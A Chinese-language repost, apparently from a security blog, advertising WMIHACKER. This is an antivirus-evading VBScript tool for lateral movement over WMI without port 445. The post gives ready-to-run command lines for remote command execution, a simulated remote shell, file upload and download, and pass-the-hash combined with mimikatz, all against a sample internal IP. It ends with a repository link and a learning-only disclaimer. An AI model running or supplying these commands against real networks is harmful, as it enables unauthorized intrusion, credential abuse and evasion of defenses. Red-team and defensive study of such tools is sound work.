一款免杀横向移动命令执行测试工具
免杀横向移动命令执行测试工具(无需445端口)
介绍:免杀横向渗透远程命令执行,常见的WMIEXEC、PSEXEC执行命令是创建服务或调用Win32_Process.create执行命令,这些方式都已经被杀软100%拦截,通过改造出WMIHACKER免杀横向移动测试工具。(无需445端口)
主要功能:1、命令执行;2、文件上传;3、文件下载;4、PTH使用
使用
合并Issue 1里PTH的使用方法:
第54-58行代码: if user = "-" And pass = "-" Then set objWMIService = objLocator.connectserver(host,"root/cimv2") Set SubobjSWbemServices = objLocator.ConnectServer(host, "rootsubscription") Set regWMIService = objLocator.ConnectServer(host, "rootdefault") 用户名和密码填“-”,结合mimikatz的PTH就可以进行WMI的PTH了。
C:UsersadministratorDesktop>cscript //nologo WMIHACKER_0.6.vbs
__ ____ __ _____ _ _ _____ _ ________ _____
/ / / |_ _| | | | | / / ____| |/ / ____| __
/ / /| / | | | | |__| | / | | | ' /| |__ | |__) |
/ / / | |/| | | | | __ | / / | | | < | __| | _ /
/ / | | | |_| |_ | | | |/ ____ |____| . | |____| |
/ / |_| |_|_____| |_| |_/_/ ______|_|_______|_| _
v0.6beta By. Xiangshan@360RedTeam
Usage:
WMIHACKER.vbs /cmd host user pass command GETRES?
WMIHACKER.vbs /shell host user pass
WMIHACKER.vbs /upload host user pass localpath remotepath
WMIHACKER.vbs /download host user pass localpath remotepath
/cmd single command mode
host hostname or IP address
GETRES? Res Need Or Not, Use 1 Or 0
command the command to run on remote host
有命令回显执行方式"Password!" "systeminfo" 1 cscript WMIHACKER_0.6.vbs /cmd 172.16.94.187 administrator 无命令回显"Password!" "systeminfo > c:1.txt" 0 cscript WMIHACKER_0.6.vbs /cmd 172.16.94.187 administrator 模拟shell模式"Password!" cscript WMIHACKER_0.6.vbs /shell 172.16.94.187 administrator 文件上传-复制本机calc.exe到远程主机c:calc.exe"Password!" "c:windowssystem32calc.exe" "c:calc" cscript wmihacker_0.4.vbe /upload 172.16.94.187 administrator 文件下载-下载远程主机calc.exe到本地c:calc.exe"Password!" "c:calc" "c:windowssystem32calc.exe" cscript wmihacker_0.4.vbe /download 172.16.94.187 administrator
下载地址:
https://github.com/rootclay/WMIHACKER
作者:rootclay,给作者点个star
原文地址:https://github.com/rootclay/WMIHACKER
黑白之道发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途及盈利等目的,否则后果自行承担!
如侵权请私聊我们删文
END